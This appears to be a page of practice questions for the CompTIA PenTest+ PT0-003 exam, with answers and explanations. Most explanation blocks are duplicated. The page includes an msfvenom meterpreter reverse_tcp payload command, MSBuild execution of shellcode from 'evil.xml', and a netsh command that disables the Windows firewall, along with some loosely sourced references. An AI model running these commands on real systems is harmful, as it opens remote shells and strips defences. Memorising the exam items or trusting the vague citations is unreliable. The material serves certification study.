Practice Free PT0-003 Exam Online Questions
Question #21
During the reconnaissance phase, a penetration tester collected the following information from the DNS records:
A—–> www
A—–> host
TXT –> vpn.comptia.org
SPF—> ip =2.2.2.2
Which of the following DNS records should be in place to avoid phishing attacks using spoofing domain techniques?
- A . MX
- B . SOA
- C . DMARC
- D . CNAME
Correct Answer: C
C
Explanation:
DMARC (Domain-based Message Authentication, Reporting & Conformance) is an email authentication protocol that helps prevent email spoofing and phishing. It builds on SPF (Sender Policy Framework) and DKIM (DomainKeys Identified Mail) to provide a mechanism for email senders and receivers to improve and monitor the protection of the domain from fraudulent email.
Understanding DMARC:
SPF: Defines which IP addresses are allowed to send emails on behalf of a domain.
DKIM: Provides a way to check that an email claiming to come from a specific domain was indeed authorized by the owner of that domain.
DMARC: Uses SPF and DKIM to determine the authenticity of an email and specifies what action to
take if the email fails the authentication checks.
Implementing DMARC:
Create a DMARC policy in your DNS records. This policy can specify to reject, quarantine, or take no action on emails that fail SPF or DKIM checks.
Example DMARC record: v=DMARC1; p=reject; rua=mailto:[email protected];
Benefits of DMARC:
Helps to prevent email spoofing and phishing attacks.
Provides visibility into email sources through reports.
Enhances domain reputation by ensuring only legitimate emails are sent from the domain.
DMARC Record Components:
v: Version of DMARC.
p: Policy for handling emails that fail the DMARC check (none, quarantine, reject). rua: Reporting URI of aggregate reports.
ruf: Reporting URI of forensic reports.
pct: Percentage of messages subjected to filtering.
Real-World Example:
A company sets up a DMARC policy with p=reject to ensure that any emails failing SPF or DKIM checks are rejected outright, significantly reducing the risk of phishing attacks using their domain. Reference from Pentesting Literature:
In "Penetration Testing – A Hands-on Introduction to Hacking," DMARC is mentioned as part of email security protocols to prevent phishing.
HTB write-ups often highlight the importance of DMARC in securing email communications and preventing spoofing attacks.
Step-by-Step ExplanationReference: Penetration Testing – A Hands-on Introduction to Hacking HTB Official Writeups
C
Explanation:
DMARC (Domain-based Message Authentication, Reporting & Conformance) is an email authentication protocol that helps prevent email spoofing and phishing. It builds on SPF (Sender Policy Framework) and DKIM (DomainKeys Identified Mail) to provide a mechanism for email senders and receivers to improve and monitor the protection of the domain from fraudulent email.
Understanding DMARC:
SPF: Defines which IP addresses are allowed to send emails on behalf of a domain.
DKIM: Provides a way to check that an email claiming to come from a specific domain was indeed authorized by the owner of that domain.
DMARC: Uses SPF and DKIM to determine the authenticity of an email and specifies what action to
take if the email fails the authentication checks.
Implementing DMARC:
Create a DMARC policy in your DNS records. This policy can specify to reject, quarantine, or take no action on emails that fail SPF or DKIM checks.
Example DMARC record: v=DMARC1; p=reject; rua=mailto:[email protected];
Benefits of DMARC:
Helps to prevent email spoofing and phishing attacks.
Provides visibility into email sources through reports.
Enhances domain reputation by ensuring only legitimate emails are sent from the domain.
DMARC Record Components:
v: Version of DMARC.
p: Policy for handling emails that fail the DMARC check (none, quarantine, reject). rua: Reporting URI of aggregate reports.
ruf: Reporting URI of forensic reports.
pct: Percentage of messages subjected to filtering.
Real-World Example:
A company sets up a DMARC policy with p=reject to ensure that any emails failing SPF or DKIM checks are rejected outright, significantly reducing the risk of phishing attacks using their domain. Reference from Pentesting Literature:
In "Penetration Testing – A Hands-on Introduction to Hacking," DMARC is mentioned as part of email security protocols to prevent phishing.
HTB write-ups often highlight the importance of DMARC in securing email communications and preventing spoofing attacks.
Step-by-Step ExplanationReference: Penetration Testing – A Hands-on Introduction to Hacking HTB Official Writeups
Question #22
A tester plans to perform an attack technique over a compromised host.
The tester prepares a payload using the following command:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.12.12.1 LPORT=10112 -f csharp
The tester then takes the shellcode from the msfvenom command and creates a file called evil.xml.
Which of the following commands would most likely be used by the tester to continue with the attack on the host?
- A . regsvr32 /s /n /u C:evil.xml
- B . MSBuild.exe C:evil.xml
- C . mshta.exe C:evil.xml
- D . AppInstaller.exe C:evil.xml
Correct Answer: B
B
Explanation:
The provided msfvenom command creates a payload in C# format. To continue the attack using the generated shellcode in evil.xml, the most appropriate execution method involves MSBuild.exe, which can process XML files containing C# code:
Understanding MSBuild.exe:
Purpose: MSBuild is a build tool that processes project files written in XML and can execute tasks defined in the XML. It’s commonly used to build .NET applications and can also execute code embedded in project files.
Command Usage:
Command: MSBuild.exe C:evil.xml
This command tells MSBuild to process the evil.xml file, which contains the C# shellcode. MSBuild will compile and execute the code, leading to the payload execution.
Comparison with Other Commands:
regsvr32 /s /n /u C:evil.xml: Used to register or unregister DLLs, not suitable for executing C# code. mshta.exe C:evil.xml: Used to execute HTML applications (HTA files), not suitable for XML containing C# code.
AppInstaller.exe C:evil.xml: Used to install AppX packages, not relevant for executing C# code embedded in an XML file.
Using MSBuild.exe is the most appropriate method to execute the payload embedded in the XML file created by msfvenom.
B
Explanation:
The provided msfvenom command creates a payload in C# format. To continue the attack using the generated shellcode in evil.xml, the most appropriate execution method involves MSBuild.exe, which can process XML files containing C# code:
Understanding MSBuild.exe:
Purpose: MSBuild is a build tool that processes project files written in XML and can execute tasks defined in the XML. It’s commonly used to build .NET applications and can also execute code embedded in project files.
Command Usage:
Command: MSBuild.exe C:evil.xml
This command tells MSBuild to process the evil.xml file, which contains the C# shellcode. MSBuild will compile and execute the code, leading to the payload execution.
Comparison with Other Commands:
regsvr32 /s /n /u C:evil.xml: Used to register or unregister DLLs, not suitable for executing C# code. mshta.exe C:evil.xml: Used to execute HTML applications (HTA files), not suitable for XML containing C# code.
AppInstaller.exe C:evil.xml: Used to install AppX packages, not relevant for executing C# code embedded in an XML file.
Using MSBuild.exe is the most appropriate method to execute the payload embedded in the XML file created by msfvenom.
Question #23
During an engagement, a penetration tester found some weaknesses that were common across the customer’s entire environment. The weaknesses included the following: Weaker password settings than the company standard
Systems without the company’s endpoint security software installed Operating systems that were not updated by the patch management system
Which of the following recommendations should the penetration tester provide to address the root issue?
- A . Add all systems to the vulnerability management system.
- B . Implement a configuration management system.
- C . Deploy an endpoint detection and response system.
- D . Patch the out-of-date operating systems.
Correct Answer: B
B
Explanation:
Identified Weaknesses:
Weaker password settings than the company standard: Indicates inconsistency in password policies across systems.
Systems without the company’s endpoint security software installed: Suggests lack of uniformity in security software deployment.
Operating systems not updated by the patch management system: Points to gaps in patch
management processes.
Configuration Management System:
Definition: A configuration management system automates the deployment, maintenance, and enforcement of configurations across all systems in an organization.
Benefits: Ensures consistency in security settings, software installations, and patch management across the entire environment.
Examples: Tools like Ansible, Puppet, and Chef can help automate and manage configurations, ensuring compliance with organizational standards. Other Recommendations:
Vulnerability Management System: While adding systems to this system helps track vulnerabilities, it does not address the root cause of configuration inconsistencies.
Endpoint Detection and Response (EDR): Useful for detecting and responding to threats, but not for enforcing consistent configurations.
Patch Management: Patching systems addresses specific vulnerabilities but does not solve broader
configuration management issues.
Pentest
Reference: System Hardening: Ensuring all systems adhere to security baselines and configurations to reduce attack surfaces.
Automation in Security: Using configuration management tools to automate security practices, ensuring compliance and reducing manual errors.
Implementing a configuration management system addresses the root issue by ensuring consistent security configurations, software deployments, and patch management across the entire environment.
B
Explanation:
Identified Weaknesses:
Weaker password settings than the company standard: Indicates inconsistency in password policies across systems.
Systems without the company’s endpoint security software installed: Suggests lack of uniformity in security software deployment.
Operating systems not updated by the patch management system: Points to gaps in patch
management processes.
Configuration Management System:
Definition: A configuration management system automates the deployment, maintenance, and enforcement of configurations across all systems in an organization.
Benefits: Ensures consistency in security settings, software installations, and patch management across the entire environment.
Examples: Tools like Ansible, Puppet, and Chef can help automate and manage configurations, ensuring compliance with organizational standards. Other Recommendations:
Vulnerability Management System: While adding systems to this system helps track vulnerabilities, it does not address the root cause of configuration inconsistencies.
Endpoint Detection and Response (EDR): Useful for detecting and responding to threats, but not for enforcing consistent configurations.
Patch Management: Patching systems addresses specific vulnerabilities but does not solve broader
configuration management issues.
Pentest
Reference: System Hardening: Ensuring all systems adhere to security baselines and configurations to reduce attack surfaces.
Automation in Security: Using configuration management tools to automate security practices, ensuring compliance and reducing manual errors.
Implementing a configuration management system addresses the root issue by ensuring consistent security configurations, software deployments, and patch management across the entire environment.
Question #24
A penetration tester has just started a new engagement. The tester is using a framework that breaks the life cycle into 14 components.
Which of the following frameworks is the tester using?
- A . OWASP MASVS
- B . OSSTMM
- C . MITRE ATT&CK
- D . CREST
Correct Answer: B
B
Explanation:
The OSSTMM (Open Source Security Testing Methodology Manual) is a comprehensive framework for security testing that includes 14 components in its life cycle.
Here’s why option B is correct: OSSTMM: This methodology breaks down the security testing process into 14 components, covering various aspects of security assessment, from planning to execution and reporting.
OWASP MASVS: This is a framework for mobile application security verification and does not have a 14-component life cycle.
MITRE ATT&CK: This is a knowledge base of adversary tactics and techniques but does not describe a 14-component life cycle.
CREST: This is a certification body for penetration testers and security professionals but does not provide a specific 14-component framework.
Reference from Pentest:
Anubis HTB: Emphasizes the structured approach of OSSTMM in conducting comprehensive security assessments.
Writeup HTB: Highlights the use of detailed methodologies like OSSTMM to cover all aspects of security testing.
Conclusion:
Option B, OSSTMM, is the framework that breaks the life cycle into 14 components, making it the correct answer.
B
Explanation:
The OSSTMM (Open Source Security Testing Methodology Manual) is a comprehensive framework for security testing that includes 14 components in its life cycle.
Here’s why option B is correct: OSSTMM: This methodology breaks down the security testing process into 14 components, covering various aspects of security assessment, from planning to execution and reporting.
OWASP MASVS: This is a framework for mobile application security verification and does not have a 14-component life cycle.
MITRE ATT&CK: This is a knowledge base of adversary tactics and techniques but does not describe a 14-component life cycle.
CREST: This is a certification body for penetration testers and security professionals but does not provide a specific 14-component framework.
Reference from Pentest:
Anubis HTB: Emphasizes the structured approach of OSSTMM in conducting comprehensive security assessments.
Writeup HTB: Highlights the use of detailed methodologies like OSSTMM to cover all aspects of security testing.
Conclusion:
Option B, OSSTMM, is the framework that breaks the life cycle into 14 components, making it the correct answer.
Question #25
During a penetration test, a tester attempts to pivot from one Windows 10 system to another Windows system. The penetration tester thinks a local firewall is blocking connections.
Which of the following command-line utilities built into Windows is most likely to disable the firewall?
- A . certutil.exe
- B . bitsadmin.exe
- C . msconfig.exe
- D . netsh.exe
Correct Answer: D
D
Explanation:
Understanding netsh.exe:
Purpose: Configures network settings, including IP addresses, DNS, and firewall settings.
Firewall Management: Can enable, disable, or modify firewall rules.
Disabling the Firewall:
Command: Use netsh.exe to disable the firewall.
netsh advfirewall set allprofiles state off
Usage in Penetration Testing:
Pivoting: Disabling the firewall can help the penetration tester pivot from one system to another by removing network restrictions.
Command Execution: Ensure the command is executed with appropriate privileges.
Reference from Pentesting Literature:
netsh.exe is commonly mentioned in penetration testing guides for configuring network settings and managing firewalls.
HTB write-ups often reference the use of netsh.exe for managing firewall settings during network-based penetration tests.
Reference: Penetration Testing – A Hands-on Introduction to Hacking HTB Official Writeups
D
Explanation:
Understanding netsh.exe:
Purpose: Configures network settings, including IP addresses, DNS, and firewall settings.
Firewall Management: Can enable, disable, or modify firewall rules.
Disabling the Firewall:
Command: Use netsh.exe to disable the firewall.
netsh advfirewall set allprofiles state off
Usage in Penetration Testing:
Pivoting: Disabling the firewall can help the penetration tester pivot from one system to another by removing network restrictions.
Command Execution: Ensure the command is executed with appropriate privileges.
Reference from Pentesting Literature:
netsh.exe is commonly mentioned in penetration testing guides for configuring network settings and managing firewalls.
HTB write-ups often reference the use of netsh.exe for managing firewall settings during network-based penetration tests.
Reference: Penetration Testing – A Hands-on Introduction to Hacking HTB Official Writeups
Question #26
A penetration tester aims to exploit a vulnerability in a wireless network that lacks proper encryption. The lack of proper encryption allows malicious content to infiltrate the network.
Which of the following techniques would most likely achieve the goal?
- A . Packet injection
- B . Bluejacking
- C . Beacon flooding
- D . Signal jamming
Correct Answer: A
A
Explanation:
If a wireless network lacks proper encryption, attackers can inject malicious packets into the traffic stream.
Packet injection (Option A):
Attackers forge and transmit fake packets to manipulate network behavior.
Common in WEP/WPA attacks to force IV collisions or spoof DHCP responses.
Reference: CompTIA PenTest+ PT0-003 Official Study Guide – "Wireless Injection and Exploitation Techniques"
Incorrect options:
Option B (Bluejacking): Sends spam messages via Bluetooth, not for network exploitation.
Option C (Beacon flooding): Overloads wireless access points, not an attack on encryption.
Option D (Signal jamming): Disrupts connectivity but does not inject packets.
A
Explanation:
If a wireless network lacks proper encryption, attackers can inject malicious packets into the traffic stream.
Packet injection (Option A):
Attackers forge and transmit fake packets to manipulate network behavior.
Common in WEP/WPA attacks to force IV collisions or spoof DHCP responses.
Reference: CompTIA PenTest+ PT0-003 Official Study Guide – "Wireless Injection and Exploitation Techniques"
Incorrect options:
Option B (Bluejacking): Sends spam messages via Bluetooth, not for network exploitation.
Option C (Beacon flooding): Overloads wireless access points, not an attack on encryption.
Option D (Signal jamming): Disrupts connectivity but does not inject packets.
Question #26
A penetration tester aims to exploit a vulnerability in a wireless network that lacks proper encryption. The lack of proper encryption allows malicious content to infiltrate the network.
Which of the following techniques would most likely achieve the goal?
- A . Packet injection
- B . Bluejacking
- C . Beacon flooding
- D . Signal jamming
Correct Answer: A
A
Explanation:
If a wireless network lacks proper encryption, attackers can inject malicious packets into the traffic stream.
Packet injection (Option A):
Attackers forge and transmit fake packets to manipulate network behavior.
Common in WEP/WPA attacks to force IV collisions or spoof DHCP responses.
Reference: CompTIA PenTest+ PT0-003 Official Study Guide – "Wireless Injection and Exploitation Techniques"
Incorrect options:
Option B (Bluejacking): Sends spam messages via Bluetooth, not for network exploitation.
Option C (Beacon flooding): Overloads wireless access points, not an attack on encryption.
Option D (Signal jamming): Disrupts connectivity but does not inject packets.
A
Explanation:
If a wireless network lacks proper encryption, attackers can inject malicious packets into the traffic stream.
Packet injection (Option A):
Attackers forge and transmit fake packets to manipulate network behavior.
Common in WEP/WPA attacks to force IV collisions or spoof DHCP responses.
Reference: CompTIA PenTest+ PT0-003 Official Study Guide – "Wireless Injection and Exploitation Techniques"
Incorrect options:
Option B (Bluejacking): Sends spam messages via Bluetooth, not for network exploitation.
Option C (Beacon flooding): Overloads wireless access points, not an attack on encryption.
Option D (Signal jamming): Disrupts connectivity but does not inject packets.
Question #28
A penetration tester is performing a security review of a web application.
Which of the following should the tester leverage to identify the presence of vulnerable open-source libraries?
- A . VM
- B . IAST
- C . DAST
- D . SCA
Correct Answer: D
D
Explanation:
Software Composition Analysis (SCA) is used to analyze dependencies in applications and identify vulnerable open-source libraries.
Option A (VM – Virtual Machine) ❌ : A VM is a computing environment, not a vulnerability detection tool.
Option B (IAST – Interactive Application Security Testing) ❌ : IAST analyzes runtime behavior, but it does not specialize in detecting vulnerable libraries.
Option C (DAST – Dynamic Application Security Testing) ❌ : DAST scans running applications for vulnerabilities, but it does not analyze open-source libraries.
Option D (SCA – Software Composition Analysis) ✅ : Correct.
Identifies security flaws in dependencies.
Used for managing supply chain risks.
Reference: CompTIA PenTest+ PT0-003 Official Guide C Software Composition Analysis (SCA)
D
Explanation:
Software Composition Analysis (SCA) is used to analyze dependencies in applications and identify vulnerable open-source libraries.
Option A (VM – Virtual Machine) ❌ : A VM is a computing environment, not a vulnerability detection tool.
Option B (IAST – Interactive Application Security Testing) ❌ : IAST analyzes runtime behavior, but it does not specialize in detecting vulnerable libraries.
Option C (DAST – Dynamic Application Security Testing) ❌ : DAST scans running applications for vulnerabilities, but it does not analyze open-source libraries.
Option D (SCA – Software Composition Analysis) ✅ : Correct.
Identifies security flaws in dependencies.
Used for managing supply chain risks.
Reference: CompTIA PenTest+ PT0-003 Official Guide C Software Composition Analysis (SCA)
Question #29
During a security assessment, a penetration tester captures plaintext login credentials on the
communication between a user and an authentication system. The tester wants to use this
information for further unauthorized access.
Which of the following tools is the tester using?
- A . Burp Suite
- B . Wireshark
- C . Zed Attack Proxy (ZAP)
- D . Metasploit
Correct Answer: B
B
Explanation:
Capturing plaintext credentials in network traffic is done using packet sniffing. Wireshark is the best tool for this task.
Option A (Burp Suite) ❌ : Used for web application testing and intercepting HTTPS traffic, but not general network sniffing.
Option B (Wireshark) ✅ : Correct.
Wireshark is a packet analysis tool that captures unencrypted network traffic, including plaintext credentials.
Option C (ZAP – Zed Attack Proxy) ❌ : Similar to Burp Suite, but focused on web application security, not network packet capture.
Option D (Metasploit) ❌ : Metasploit is used for exploitation rather than capturing traffic.
Reference: CompTIA PenTest+ PT0-003 Official Guide C Packet Sniffing & Network Traffic Analysis
B
Explanation:
Capturing plaintext credentials in network traffic is done using packet sniffing. Wireshark is the best tool for this task.
Option A (Burp Suite) ❌ : Used for web application testing and intercepting HTTPS traffic, but not general network sniffing.
Option B (Wireshark) ✅ : Correct.
Wireshark is a packet analysis tool that captures unencrypted network traffic, including plaintext credentials.
Option C (ZAP – Zed Attack Proxy) ❌ : Similar to Burp Suite, but focused on web application security, not network packet capture.
Option D (Metasploit) ❌ : Metasploit is used for exploitation rather than capturing traffic.
Reference: CompTIA PenTest+ PT0-003 Official Guide C Packet Sniffing & Network Traffic Analysis
Question #30
A penetration tester is performing an assessment focused on attacking the authentication identity provider hosted within a cloud provider. During the reconnaissance phase, the tester finds that the system is using OpenID Connect with OAuth and has dynamic registration enabled.
Which of the following attacks should the tester try first?
- A . A password-spraying attack against the authentication system
- B . A brute-force attack against the authentication system
- C . A replay attack against the authentication flow in the system
- D . A mask attack against the authentication system
Correct Answer: C
C
Explanation:
OpenID Connect (OIDC) with OAuth allows applications to authenticate users using third-party identity providers (IdPs). If dynamic registration is enabled, attackers can abuse this feature to capture and replay authentication requests.
Replay attack (Option C):
Attackers capture legitimate authentication tokens and reuse them to impersonate users. OIDC uses JWTs (JSON Web Tokens), which may not expire quickly, making replay attacks highly effective.
Reference: CompTIA PenTest+ PT0-003 Official Study Guide – "Attacking Identity Providers and OAuth"
Incorrect options:
Option A (Password spraying): Effective against user accounts, but this attack targets authentication tokens.
Option B (Brute-force attack): Less effective against OAuth-based authentication since tokens replace passwords.
Option D (Mask attack): Related to password cracking, not OAuth authentication attacks.
C
Explanation:
OpenID Connect (OIDC) with OAuth allows applications to authenticate users using third-party identity providers (IdPs). If dynamic registration is enabled, attackers can abuse this feature to capture and replay authentication requests.
Replay attack (Option C):
Attackers capture legitimate authentication tokens and reuse them to impersonate users. OIDC uses JWTs (JSON Web Tokens), which may not expire quickly, making replay attacks highly effective.
Reference: CompTIA PenTest+ PT0-003 Official Study Guide – "Attacking Identity Providers and OAuth"
Incorrect options:
Option A (Password spraying): Effective against user accounts, but this attack targets authentication tokens.
Option B (Brute-force attack): Less effective against OAuth-based authentication since tokens replace passwords.
Option D (Mask attack): Related to password cracking, not OAuth authentication attacks.